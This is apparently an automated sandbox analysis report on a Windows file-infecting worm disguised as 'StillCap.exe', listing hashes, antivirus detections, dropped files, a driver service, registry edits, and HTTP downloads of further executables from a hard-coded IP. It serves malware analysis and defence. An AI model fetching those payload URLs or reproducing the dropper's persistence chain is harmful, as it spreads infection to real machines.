Analysis Date: 2015-01-27 00:56:15
MD5: 45e5a3080ee1752b1f9521b2bd9db7bc
SHA1: 237428dcba3d0b08649b6fde492f5a1627fcac48

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 6bd9b013504e0900f79cb19f921e5268 sha1: 1dd70a2d4cb34709c1dc87f5d1b4ea280f8ef701 size: 28672
Section .rdata md5: 7e4dc6f3925e3bbd844abe1404fa3ecc sha1: cb2609275ac1f62c3ebea9dc8cb8bfebb87eb8c5 size: 4096
Section .data md5: 1707b0611b6a9d194dbe6958f859285e sha1: 3cceab212b4ce7754c888085d2fd995e3c24b511 size: 12288
Section .rsrc md5: 6dc71f40e201bd6ab0c5a6f31ecfd971 sha1: cf05f2664bb36df62ce3a63a6b0028c97d36b087 size: 40448
Section .tc md5: b66895d29926164b0057a3dd48630b40 sha1: 2836c3c1de68c0c15897e04e8002b6c832cbe2f1 size: 28672
Timestamp: 2002-08-22 08:49:58
Version:
LegalCopyright: VM., 2002.
FileDescription: Still Image(STI) Application
FileVersion: 4.2.618.35
OriginalFilename: StillCap.exe
CompanyName: VM
PEhash: b9c181446e6c6214bc0941c4ed04e8c9d4af927c
IMPhash: 79a1ab37da36cff15bf347149fc3fab3
AV 360 Safe: Virus.Win32.Agent.O
AV Ad-Aware: Win32.Viking.AR
AV Alwil (avast): Crypt-RPT [Trj]
AV Arcabit (arcavir): Win32.Viking.AR
AV Authentium: W32/Viking.A.gen!Eldorado
AV Avira (antivir): W32/Fujacks.DR
AV BullGuard: Win32.Viking.AR
AV CA (E-Trust Ino): Win32/Viking.D
AV CAT (quickheal): W32.Agent.DP
AV ClamAV: Worm.Fujack-55
AV Dr. Web: Win32.HLLW.Autoruner.8224
AV Emsisoft: Win32.Viking.AR
AV Eset (nod32): Win32/Agent.DP virus
AV Fortinet: W32/Fujacks.BF!tr
AV Frisk (f-prot): W32/Viking.A.gen!Eldorado
AV F-Secure: Win32.Viking.AR
AV Grisoft (avg): Win32/Fujacks.S
AV Ikarus: Trojan-Downloader.Win32.Jadtre
AV K7: Virus ( 00108a531 )
AV Kaspersky: Virus.Win32.Agent.dp
AV MalwareBytes: no_virus
AV Mcafee: W32/Fujacks.ay
AV Microsoft Security Essentials: Error Scanning File
AV MicroWorld (escan): Win32.Viking.AR
AV Rising: Win32.Agent.hn
AV Sophos: W32/FuzVir-A
AV Symantec: W32.Loorp.A!inf
AV Trend Micro: PE_JEEFO.D
AV VirusBlokAda (vba32): Virus.Win32.Koklek

Runtime Details:

Process
↳ C:\malware.exe

Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\2aa6_appcompat.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates Process: C:\WINDOWS\system32\drwtsn32 -p 436 -e 152 -g
Creates Process: C:\WINDOWS\system32\dwwin.exe -x -s 196
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"

Creates File: C:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates File: PIPE\SfcApi
Creates File: PIPE\wkssvc
Creates File: C:\WINDOWS\system32\qmgr.dll
Creates File: C:\WINDOWS\system32\mspmsnsv.dll
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Creates Process: "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Starts Service: WmdmPmSN

Process
↳ C:\WINDOWS\system32\dwwin.exe -x -s 196

Process
↳ C:\WINDOWS\system32\drwtsn32 -p 436 -e 152 -g

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 800

Process
↳ Pid 848

Process
↳ C:\WINDOWS\System32\svchost.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝ 2
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\4L6NSLAV\desktop.ini
Creates File: NtHid
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CX6ZKLI3\desktop.ini
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates File: C:\Documents and Settings\NetworkService\Cookies\index.dat
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\9JBUM5O7\desktop.ini
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\V2QU2QN9\desktop.ini
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\WINDOWS\TEMP\NtHid.sys
Creates File: C:\WINDOWS\system32\WBEM\Logs\wbemess.log
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File: C:\WINDOWS\TEMP\NtHid.sys
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Creates Mutex: c:!documents and settings!networkservice!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!networkservice!cookies!
Creates Mutex: c:!documents and settings!networkservice!local settings!temporary internet files!content.ie5!
Creates Service: NtHid - C:\WINDOWS\TEMP\NtHid.sys
Winsock DNS: 204.11.56.45
Winsock DNS: www.490a-B8B5-9B8C1E870B0C.com
Winsock DNS: www.baidu.com
Winsock DNS: pc1.114central.com

Process
↳ Pid 1204

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Process
↳ Pid 1888

Process
↳ Pid 1192

Network Details:

DNS: www.a.shifen.com
Type: A
180.76.3.151
DNS: pc1.114central.com
Type: A
204.11.56.45
DNS: www.baidu.com
Type: A
DNS: nbtj.114anhui.com
Type: A
DNS: www.490a-B8B5-9B8C1E870B0C.com
Type: A
HTTP GET: http://204.11.56.45/ko/01.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://204.11.56.45/ko/02.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://204.11.56.45/ko/03.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1033 ➝ 204.11.56.45:80
Flows TCP: 192.168.1.1:1034 ➝ 204.11.56.45:80
Flows TCP: 192.168.1.1:1035 ➝ 204.11.56.45:80

Raw Pcap
Strings